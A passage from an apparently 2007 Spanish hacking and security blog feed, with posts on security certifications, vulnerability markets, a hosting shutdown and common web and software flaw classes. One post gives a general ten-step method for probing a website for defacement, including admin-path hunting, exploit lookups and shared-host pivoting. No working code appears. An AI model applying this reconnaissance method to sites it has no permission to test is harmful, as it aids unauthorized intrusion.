width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-1372859470176448234</id><published>2007-10-18T23:01:00.000+02:00</published><updated>2007-10-24T23:01:58.804+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Certificaciones de Seguridad'/><title type='text'>Certificaciones de Seguridad</title><content type='html'>Hoy voy a hablar de estas certificaciones famosas entre los jefes y que les gusta que los empleados las tengan cuando trabajan en seguridad informática, sin saber realmente que algunos son puro papel y diploma y realmente enseñan conocimientos que puedes adquirir tu rápidamente de internet excepto algunos que hay práctica de laboratorio pero a la hora del exámen es solo teórico, para mi perspectiva hay varios problemas en este tipo de certificaciones:&lt;br /&gt;&lt;br /&gt;1- El precio de este tipo de certificaciones es muy elevado para mi cartera.&lt;br /&gt;2- Los exámenes suelen ser en inglés excepto el CCNA que puede hacerse en español y por lo tanto te dificulta a lo mejor a la hora de entender perfectamente lo que te pregunta.&lt;br /&gt;3- A la hora de los conocimientos muchas veces se pueden aprender de internet y te ahorras los anteriores problemas.&lt;br /&gt;&lt;br /&gt;Por lo tanto, los aconsejo para los que tengan dinero y se lo puedan permitir fácilmente ya que algunas empresas se fijan más en ello, para los que tengan poco lo mejor es esperar tal vez y cuando puedas permitirlo si quieres hacerlo y tal hay buenas empresas que hacen los exámenes en zonas de España y no tienes que viajar muy lejos. A veces, algunas empresas regalan cursos de este tipo a sus empleados pero eso depende de cada una.&lt;br /&gt;&lt;br /&gt;Estos días iré poniendo varios tipos de certificaciones con su temario y tal. Hay un larga lista de ellas:&lt;br /&gt;&lt;br /&gt;- &lt;a href="http://www.eccouncil.org/"&gt;EC-Council Security Certification&lt;/a&gt;&lt;br /&gt;+CHFI - Computer Hacking Forensic Investigator&lt;br /&gt;+CEH   - Certified Ethical Hacker&lt;br /&gt;+ECSA - EC-Council Certified Security Analyst&lt;br /&gt;+LPT   - Licensed Penetration Tester&lt;br /&gt;- &lt;a href="https://www.isc2.org/"&gt;(ISC)²&lt;/a&gt;&lt;br /&gt;+CISSP  - Certified Information Systems Security Professional&lt;br /&gt;+ISSAP  - Information Systems Security Architecture Professional&lt;br /&gt;+ISSMP - Information Systems Security Management Professiona&lt;br /&gt;+ISSEP  - Information Systems Security Engineering Professional&lt;br /&gt;+CAP     - Certification and Accreditation Professional&lt;br /&gt;+SSCP   - Systems Security Certified Practitioner&lt;br /&gt;- &lt;a href="http://www.comptia.org/"&gt;Computing Technology Industry Association&lt;/a&gt;&lt;br /&gt;+CompTIA Security+&lt;br /&gt;+CompTia A+&lt;br /&gt;- &lt;a href="http://www.isaca.org/"&gt;ISACA&lt;/a&gt;&lt;br /&gt;+CISA    - Certified Information Systems Auditor&lt;br /&gt;+CISM   - Certified Information Security Manager&lt;br /&gt;+CGEIT - Certified in the Governance of Enterprise IT&lt;br /&gt;- &lt;a href="http://www.giac.org/"&gt;GIAC&lt;/a&gt;&lt;br /&gt;+GIAC   - Global Information Assurance Certification&lt;br /&gt;+GREM - GIAC Reverse Engineering Malware&lt;br /&gt;+GHTQ - GIAC Cutting Edge Hacking Techniques&lt;br /&gt;+GWAS - GIAC Web Application Security&lt;br /&gt;- &lt;a href="http://www.cisco.com/"&gt;CISCO&lt;/a&gt;&lt;br /&gt;+CCENT - Cisco Certified Entry Networking Technician&lt;br /&gt;+CCNA   - Cisco Certified Network Associate&lt;br /&gt;+CCSP    - Cisco Certified Security Professional&lt;br /&gt;+CCIE    - Cisco Certified Internetwork Expert&lt;br /&gt;&lt;a href="http://www.giac.org/"&gt;&lt;/a&gt;- &lt;a href="http://www.microsoft.com/"&gt;Microsoft&lt;/a&gt;&lt;br /&gt;+MCP    - Microsoft Certified Professional&lt;br /&gt;+MCSA - Microsoft Certified System Associate&lt;br /&gt;+MCSE - Microsoft Certified System Engineer&lt;br /&gt;- &lt;a href="http://www.ngsec.com/"&gt;Next Generation Security&lt;/a&gt;&lt;br /&gt;+NSC - NGSEC Security Certification&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-1372859470176448234?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/1372859470176448234/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=1372859470176448234' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/1372859470176448234'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/1372859470176448234'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/certificacion-de-seguridad.html' title='Certificaciones de Seguridad'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6272849878830513770</id><published>2007-10-16T00:34:00.000+02:00</published><updated>2007-10-17T00:07:36.780+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><category scheme='http://www.blogger.com/atom/ns#' term='Auditoria'/><title type='text'>Auditoria de una pagina a nivel Web</title><content type='html'>Esta vez voy a hablar de como vulnerar una web de un modo general y sencillo, es decir, los pasos que tenemos que seguir generalmente para encontrar posibles fallos para defacear una web y ya de paso también sirva a los webmasters que quieran comprobar la seguridad de su web y asi estar siempre mas seguros. Asi que os muestro mas o menos mi metodologia que utilizo yo. Para ello haremos un riguroso analisis de la web en cuestion.&lt;br /&gt;&lt;br /&gt;Podemos seguir estos 10 sencillos pasos:&lt;br /&gt;&lt;br /&gt;1-Mirar con que lenguaje se programo la web: Php, Asp, Html, XML, Flash...&lt;br /&gt;1.1- Html: seguramente haya que buscar otro modo, como por el servidor o mirar a ver si hay alguna parte que no sea html&lt;br /&gt;1.2- Javascript, Flash, Java...paginas que contienen partes importantes en estos lenguajes como autentificacion pueden ser vulnerados facilmente, ya que se puede conseguir el codigo.&lt;br /&gt;1.3- Asp, Php, XML...suelen tener graves problemas ya que se puede hacer muchas cosas con esos lenguajes, en esta nos centraremos a nivel web muchas veces.&lt;br /&gt;&lt;br /&gt;2-Buscar si la pagina web es un paquete precompilado tipo CMS, por ejemplo, como Joomla, Php-Nuke, etc. Si lo es suele ser algo a nuestro favor ya que dispondriamos del codigo porque es libre y visible para todos.&lt;br /&gt;&lt;br /&gt;3-Ver si existe robots.txt que sirve para ver directorios ocultos que el robot de google por ejemplo mira para que no cachee esos directorios, suele dar info de cosas importantes como directorio del admin.&lt;br /&gt;&lt;br /&gt;4-Uso de buscadores para encontrar posibles archivos o directorios importantes: site:www.sitio.com eso encontraria varios enlaces en lo que podria estar alguno importante.&lt;br /&gt;&lt;br /&gt;5-Directorios y archivos comunes: admin.***, administracion.***, login.***, etc y entre directorios: /zona admin/;/administracion/...etc. Un programa que da buenos resultados en busqueda de directorios es el acunetix que suele buscar directorios comunes en los que puede a ver logueos y demas.&lt;br /&gt;&lt;br /&gt;6-Referenciado al punto 2, se podria buscar posibles fallos de ese paquete en www.milw0rm.com del colega str0ke, pagina que suele albergar todo tipo de exploits.&lt;br /&gt;&lt;br /&gt;7-En caso de no encontrar nada ahi o en otras webs, tantear y probar tu mismo en sistemas de logueo de usuarios, de administracion, de busqueda, etc, inyecciones o sino en variables mediante GET O POST inclusiones, XSS, y otros tipos de vulnerabilidades.&lt;br /&gt;&lt;br /&gt;8-Si nada de esto funciona la cosa es ponerse a investigar en el codigo tu mismo si lo tienes disponible, para ello deberas saber mas informacion de como y donde se producen las tipicas vulnerabilidades.&lt;br /&gt;&lt;br /&gt;9-Un meto alternativo ya fuera de esto seria la Ingenieria Social, pero que no he probado ya que nunca he atacado un servidor especifico por algun motivo pero suele ser muy buena debilidad porque los empleados no estan preparados como deberian estarlo.&lt;br /&gt;&lt;br /&gt;10-Otras formas ya que no tienen que ver con este texto, como es entrar por el servidor o ir a la empresa y hacer a lo espia, ahi con tu traje negro como si fueras uno mas, asi seguro te lo pases mejor.&lt;br /&gt;&lt;br /&gt;*Un metodo bastante importante que se me olvidaba es buscar si es un servidor compartido para ello tenemos la herramienta Reverse IP de &lt;a href="http://www.seologs.com/ip-domains.html"&gt;Seologs&lt;/a&gt; y a partir de ahi buscar en otras webs para lograr entrar al servidor y al fin llegar a la nuestra.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Este texto principalmente esta hecho rapidamente y para que tengan una idea mas o menos asi que es posible que la cague por las prisas y bueno como me lo pidieron varios usuarios de yashira.org pues me anime a escribirlo aunque es algo que se va aprendiendo con la experiencia, espero que al menos os guie un poco.&lt;br /&gt;&lt;br /&gt;Cualquier cosa decirme y lo cambio, aun asi mañana le dare un vistacillo si saco tiempo, ademas me acostumbrare a poner tildes que no las suelo poner para evitar problemas.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6272849878830513770?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6272849878830513770/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6272849878830513770' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6272849878830513770'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6272849878830513770'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/auditoria-de-una-pagina-nivel-web.html' title='Auditoria de una pagina a nivel Web'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-2904944083683560535</id><published>2007-10-13T16:40:00.000+02:00</published><updated>2007-10-13T16:53:00.104+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezine Yashira'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad'/><title type='text'>Yashira OFF, por mucho tiempo?</title><content type='html'>&lt;div style="text-align: center;"&gt;Comunicado de Pescaodeth&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;-------------------------------------------------------&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Yashira Regresa?     &lt;br /&gt;Publicado por PescaoDeth - 12-10-07 19:44&lt;br /&gt;Muchos se preguntarón que sucedió.&lt;br /&gt;&lt;br /&gt;para resumir todo... dejaré los mensajes enviados por DH fué como sigue:&lt;br /&gt;CITA&lt;br /&gt;&lt;br /&gt;Hello,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Your account has been permanently disabled for violations of our Terms of Service (operation of "hacking"/computer intrusion sites, presence of unauthorized copyrighted materials). It will not be re-enabled.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Jeff,&lt;br /&gt;&lt;br /&gt;------------------------------------&lt;br /&gt;&lt;br /&gt;luego de un petición para recuperar los backups correspondientes y una posible reactivación, la respuesta fué la siguiente:&lt;br /&gt;"Tomando en cuenta que tardaron de 2 días en enviar la respuesta (total ya pagamos así que led dá igual)". y dando como escusa que nuestro sitio se trata principalmente de wargames y similares orienta a comprender las distintas ramas de informática.&lt;br /&gt;&lt;br /&gt;CITA&lt;br /&gt;&lt;br /&gt;This is a commonly heard excuse, but it rings hollow. Not only are some&lt;br /&gt;of the tools you have under your account clearly meant for brute force&lt;br /&gt;attacks against others, you are also engaging in copyright infringement&lt;br /&gt;(ebooks, etc).&lt;br /&gt;&lt;br /&gt;The account will not be re-enabled under any circumstances.&lt;br /&gt;&lt;br /&gt;Jeff,&lt;br /&gt;&lt;br /&gt;------------------------------------&lt;br /&gt;&lt;br /&gt;aún seguimos esperando una respuesta para recuperar al menos la base de datos.&lt;br /&gt;pero ya se perdieron esperanzas.&lt;br /&gt;&lt;br /&gt;¿creen que es justo pagar por todo 1 año sin derecho a reemboloso de los meses no utlizados y además sin derecho a tus backups?&lt;br /&gt;yo pienso que no!!!, me parece que es una estafa.&lt;br /&gt;&lt;br /&gt;alguien se ha preguntado como llenar un disco de 250 gigas con material 100% legal, es decir sin mp3,videos,juegos,ezines, etc....&lt;br /&gt;&lt;br /&gt;es por el mismo motivo que ofrecen esa cantidad de espacio ya que es casi imposible llenarlo.&lt;br /&gt;y encaso de que alguien comiencé o ocupar espacio fuera de lo normal, no tardarán en encontrar una escusa para clausurar tu cuenta. ya que no estaba presupuestado que ocuparas mas de 10 gigas ya que nadie ocupa esa cantidad sin que sea 100% legal.&lt;br /&gt;&lt;br /&gt;ya saben ;) pasen el dato que dreamhost vale vergas.&lt;br /&gt;&lt;br /&gt;lo concreto es:&lt;br /&gt;-el backup mas reciente es del día en que aparecen los puntajes del podium , es decir: 27 de septiembre 2007&lt;br /&gt;- no tenemos host.&lt;br /&gt;- y al menos yo como admin no gastaré 1 peso en un host que seguramente a los 3 meses lo vuelvan a cerrar por el mismo motivo.&lt;br /&gt;&lt;br /&gt;Entonces regresará yashira?&lt;br /&gt;- depende de los usuarios. si en realidad les interese que vuelva comuniquense con garcez,Alexhk_23 o g30rg3_x sobre ofertas de host y/o colaboraciones desinteresada de dinero.&lt;br /&gt;les recordamos que yashira consume mas de lo normal en recursos y que necesita de al menos unas 40gigas de transferencia mensual y al menos 2 giga de espacio.&lt;br /&gt;&lt;br /&gt;Cual es el pronóstico?&lt;br /&gt;- lo mas probable es que yashira no vuelva a estar online, y no es debido a que los admin sean kagones con el dinero, si no mas bien que en todos los lugares donde se aloje, estará fuera de lo legal y/o terminos del host ya sea host o servidor dedicado "ya que al final de cuentas igual está regido por las mismas reglas".&lt;br /&gt;&lt;br /&gt;y si vuelve reestructurada?&lt;br /&gt;&lt;br /&gt;opciones:&lt;br /&gt;- una posibilidad sería que no existan descargas de ninguna clase de tools, y ser mas exigentes en el material a alojar en el sitio.&lt;br /&gt;- dejar el sitio solamente como wargame+foro activos.&lt;br /&gt;- cerrar yashira y dedicarlo solo a wargame.&lt;br /&gt;- cerrar y dejar los retos hasta donde estaban sin pocion de agregar contendio ni retos.&lt;br /&gt;&lt;br /&gt;que puedo hacer para colaborar y que vuelva?&lt;br /&gt;comunicarse con garcez,Alexhk_23 o g30rg3_x sobre ofertas y colaboraciones monetarias.&lt;br /&gt;por cierto lean http://www.dreamhost.com/tos.html que aparece cuando contratan el servico:&lt;br /&gt;pero milagrosamente tienen oculto al momento de contratar.&lt;br /&gt;http://abuse.dreamhost.com/ el cual aparece milagrosamente.&lt;br /&gt;en otras palabras te dicen que pueden cerrar los sitios cuando se les antoje ya que todos están fuera de lo legal.&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Pues leo esto y pienso que al menos con lo que costo el server, podrian devolver algo o en vez de cerrar hablar con el admin y que le de unos dias para que lo cambie o se le cierra, pero no ganar dinero y ala a olvidarse de la gente, asi se forran todos y asi va el mundo, con gente asi es de esperar que no muy bien, pero bueno se esta haciendo lo posible para que vuelva y todos tengan un lugar donde reunirse y hablar, si no esperen con el host que vengo que es bueno barato y tal vez haciendole unas pocas modificacioens se pueda.&lt;br /&gt;&lt;br /&gt;Os veo Yashirosss y pez trankilo que esta vez lo pagan los yashiros y si se puede con el que digo lo pago yo mismo!!! Ya lo sabes!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-2904944083683560535?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/2904944083683560535/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=2904944083683560535' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2904944083683560535'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2904944083683560535'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/yashira-off-por-mucho-tiempo.html' title='Yashira OFF, por mucho tiempo?'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6900822876469196778</id><published>2007-10-06T22:53:00.001+02:00</published><updated>2008-09-21T18:09:24.547+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Venta de Vulnerabilidades'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Vendiendo Vulnerabilidades</title><content type='html'>Hace relativamente poco tiempo parecia que iba a causar furor una web de este tipo y que se iba a acabar el ser buena persona y reportarlos gratuitamente como se ha hecho la mayoria de veces, pero una web &lt;a href="http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"&gt;Wabisabilabi&lt;/a&gt; en la que ponian los fallos y el dinero que vale, lo mas gracioso que era de preveer es que la gente que estaba en contra de esto, han empezado a ver la web para que posteen uno y buscar el bug y publicarlo antes de que se venda, y a mi parecer hacen bien que lo hagan gratuitamente, es mas yo estare atento alguna que otra vez para ver si puedo hacer algo, porque asi no se trafica tanto con la informacion jeje, y bueno la verdad que lo venden muy caro para el sotfware que es, asi que vendan lo que puedan pero eso si en poco tiempo o ya no servira.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img413.imageshack.us/img413/5347/wasied3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://img413.imageshack.us/img413/5347/wasied3.jpg" alt="" border="0" /&gt;&lt;/a&gt;PD: Para los que publican los bugs gratuitamente una enhorabuena a todos, eso si no habria muchos si se programase mejor y se vigilase desde el principio eso :P&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6900822876469196778?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6900822876469196778/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6900822876469196778' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6900822876469196778'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6900822876469196778'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/vendiendo-vulnerabilidades.html' title='Vendiendo Vulnerabilidades'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-143705285630711828</id><published>2007-10-04T22:34:00.000+02:00</published><updated>2007-10-04T23:06:31.151+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas WEB'/><title type='text'>Evitar el papeleo de registrarse en una web</title><content type='html'>Cuando necesitas un usuario registrado para entrar en un server mediante la tecnica de falsear cookies o simplemente que quieres ahorrarte tiempo al ver los contenidos de una web y te manda registrarte pues lo mejor es ir a esta web &lt;a href="http://www.bugmenot.com/"&gt;Bugmenot&lt;/a&gt; e ingresar la web de la cual quieres la contraseña y te saldra la mayoria de las veces una valida. A mi la verdad me ha ahorrado bastante tiempo asi que espero que os sirve, no se si existiran mas paginas de este tipo, pero os sera de ayuda para los perezosos como yo&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img130.imageshack.us/img130/3448/screen1ww1.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://img130.imageshack.us/img130/3448/screen1ww1.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-143705285630711828?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/143705285630711828/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=143705285630711828' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/143705285630711828'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/143705285630711828'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/10/evitar-el-papeleo-de-registrarse-en-una.html' title='Evitar el papeleo de registrarse en una web'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6927191724197749448</id><published>2007-09-28T22:25:00.000+02:00</published><updated>2007-09-28T23:28:02.026+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Humor Malo'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>¿Buscaban "Hacker" o persona con conocimientos minimos?</title><content type='html'>Bueno me meti en el blog de &lt;a href="http://mousehack.blogspot.com/"&gt;mousehack&lt;/a&gt;, un user de elhacker.net y aunque anda algo desactualizado el blog me fije en un escrito que habia hecho, donde decia que:&lt;br /&gt;&lt;br /&gt;&lt;h3 style="color: rgb(204, 102, 204);" class="post-title"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:130%;" &gt;Buscan Hacker...&lt;/span&gt;&lt;br /&gt;   &lt;/h3&gt;                  &lt;p&gt;       &lt;/p&gt;Una empresa inglesa busca un "hacker" para mejorar o rehacer páginas webs seguras. Los candidatos que se ajusten al perfil deberían encontrar facilmente la dirección a la que enviar su curriculum en la siguiente cadena de texto: 43616c6c204a756c69616e206f6e20303230203739323420363632206f7220656d61696c206a756c69616e406c6f6e7265732e636f6d Solo admiten curriculums en texto plano o pdf.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;y me llamo la atencion y pense...a ver si va a ser un hash de esos raros tiger o algo asi que suelen ser largos... y bueno dije mejor pasar aunque ande aburrido, pero bueno por probar no me pasaba nada...y me fue a desencriptar como si eso fuera texto ascii cifrado en hexadecimal, aunque pensaba que no seria porque buscaban un "hacker" pero derrepente veo que me lo descifra y dice: Call Julian on 020 7924 662 or email julian@lonres.com&lt;br /&gt;Entonces ahi pense, este no necesita un hacker...este no tiene ni idea, y lo tercero menuda tonteria mas grande, asi que na, no avise para ver si tenia el curro porque no merece la pena...&lt;br /&gt;Asi que nada, gente asi falta mas jejeje se encontrara trabajo mas facilmente.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6927191724197749448?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6927191724197749448/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6927191724197749448' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6927191724197749448'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6927191724197749448'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/09/buscaban-hacker-o-tonterias.html' title='¿Buscaban &quot;Hacker&quot; o persona con conocimientos minimos?'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-6654835833407696821</id><published>2007-09-27T22:18:00.000+02:00</published><updated>2007-09-29T22:27:07.235+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades Software'/><title type='text'>Errores de programacion</title><content type='html'>El principal problema de los llamados Hackers...prefiero llamarles Defacers mejor que es a lo que se dedican o eso nos hacen creer, tratan de modificar muchas veces el contenido de webs, o tambien los Crackers como alguien que entra en un sistema para hacer cosas ilegales y que perjudican al usuario, aunque eso de crackers se utiliza mas para los que estudian Ing. Inversa por lo que deberian llamarlos mas Ingenieros Inversos o algo asi jeje.&lt;br /&gt;Tanto es asi que en la sociedad a los "Hackers" en la sociedad se les mira mal o lo usan de mala manera cuando muchos de ellos son los que arreglan los fallos de programacion al avisar de ellos y ayudan a mejorar el sistema. Entre los fallos mas importantes estan:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;A nivel web:&lt;/span&gt;&lt;br /&gt;Los que suelen ser por problemas de codigo de programacion para diseño de paginas web y que permiten hacer a un atacante muchas otras cosas como phising, intrusion total al servidor, sacar datos, contraseñas debiles y estudios de algoritmos para saltarse protecciones. Los fallos mas comunes son:&lt;br /&gt;-XSS(&lt;span style=""&gt;Cross Site Scripting)&lt;/span&gt;&lt;br /&gt;-CSRF(&lt;span style=""&gt;&lt;span class="a"&gt;Cross site request forgery)&lt;br /&gt;-RFI Y LFI(Remote/Local File Inclusion)&lt;br /&gt;-INYECCIÓN SQL/LDAP/X-PATH&lt;br /&gt;-VER CODIGO FUENTE SIN OFUSCAR(Java,Flash, Javascript...)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;A nivel de software:&lt;/span&gt;&lt;br /&gt;Los problemáticos que permiten principalmente ejecutar codigo arbitrario en la maquina o ganar permisos de admin son:&lt;br /&gt;-BUFFER OVERFLOWS(Stack, Heap, Format String...)&lt;br /&gt;-DOS/DDOS(&lt;span style=""&gt;Ataque de Denegación de Servicio, Distribuido&lt;/span&gt;)&lt;br /&gt;-CODIGOS QUE PERMITEN BYPASSEAR PROTECCIONES(En php por ejemplo)&lt;br /&gt;-OTRAS TECNICAS&lt;br /&gt;&lt;br /&gt;Conociendo estas tecnicas muy bien y teniendo buena informacion es posible ya encontrar tus propios bugs y asi tener cuidado programando, es algo en lo que fallan las empresas, que se olvidan de la seguridad y luego llegan las consecuencias...por lo tanto deberian ponerse a enseñar como minimo estos fallos, dependiendo de lo que esten haciendo yentre todos ayudar a que haya mas info en español, asi que dentro de nada os escribo un articulo de una de nivel web que este lo mas completa y viendo todo tecnicamente y practicamente, ya que lo que busque en español siempre se repite, y lo del ingles habia buena info pero dispersada.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-6654835833407696821?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/6654835833407696821/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=6654835833407696821' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6654835833407696821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/6654835833407696821'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/09/errores-de-programacion.html' title='Errores de programacion'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-3158541251219274224</id><published>2007-09-20T22:52:00.000+02:00</published><updated>2007-09-22T16:39:17.623+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><title type='text'>Buscando Bugs en Gallery 2(en espera)</title><content type='html'>Bueno pues me puse a la busca de bugs de una version de Gallery 2, exactamente la 2.2.3 y en la que me baje completamente con todos los addons, una version de casi 20MB, la idea es que alguien como yo con conocimientos justos en php y de los errores mas comunes que hay si puede ser demuestre que no es muy dificil buscar bugs en software y que deberian testearse cualquier software en profundidad antes de ser lanzado, espero confundirme y no encontrar nada jejeje(broma me haria ilusion encontrar alugno xD), y bueno en caso de 